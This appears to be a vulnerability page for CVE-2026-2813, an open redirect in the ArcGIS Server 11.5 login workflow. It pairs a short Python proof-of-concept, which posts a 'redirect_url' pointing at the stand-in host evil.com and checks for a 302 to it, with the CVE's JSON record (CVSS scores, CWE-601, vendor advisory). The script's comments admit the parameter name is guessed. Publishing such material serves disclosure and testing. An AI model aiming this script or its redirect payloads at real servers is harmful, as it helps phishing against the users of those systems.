CVE-2026-2813

import requests # PoC for CVE-2026-2813: ArcGIS Server Open Redirect # This script demonstrates the vulnerability by generating a malicious link. target_url = "https://example.com/arcgis/home/signin.html" # Example login endpoint malicious_site = "http://evil.com" # The application likely fails to validate the 'redirect_url' or 'return_url' parameter # Attacker constructs a URL to redirect the victim after login payload = { "redirect_url": malicious_site, "username": "test", "password": "test" } print(f"[*] Attempting to send request to {target_url} with redirect to {malicious_site}") try: # Sending the request (allow_redirects=False to see the 302 response) response = requests.post(target_url, data=payload, allow_redirects=False, timeout=5) # Check if the response is a redirect (HTTP 302) if response.status_code == 302: location = response.headers.get('Location') if location and malicious_site in location: print(f"[+] Vulnerability Confirmed! Server redirected to: {location}") else: print(f"[-] Redirect occurred but to a different location: {location}") else: print(f"[-] Expected 302 Redirect, got status code: {response.status_code}") except Exception as e: print(f"[!] Error occurred: {e}")

{"cve": {"id": "CVE-2026-2813", "sourceIdentifier": "[email protected]", "published": "2026-05-20T20:16:37.087", "lastModified": "2026-05-21T18:54:30.093", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ArcGIS Server contains an input validation weakness in the login redirection workflow. An Authenticated attacker could exploit this issue by sending a specially crafted request, Successful exploitation may result in the application redirecting the browser to an unintended, untrusted site, resulting in a limited confidentiality impact under specific user interaction conditions.\nThe vulnerability affects only the client side navigation logic during authentication and remains confined to the same security boundary. No server side compromise or cross component impact is possible.  This issue affects ArcGIS Server 11.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:esri:arcgis_server:11.5:*:*:*:*:*:*:*", "matchCriteriaId": "3DA8FA85-B1E7-4474-814F-BA53E386096C"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/april2026_security_bulletin", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}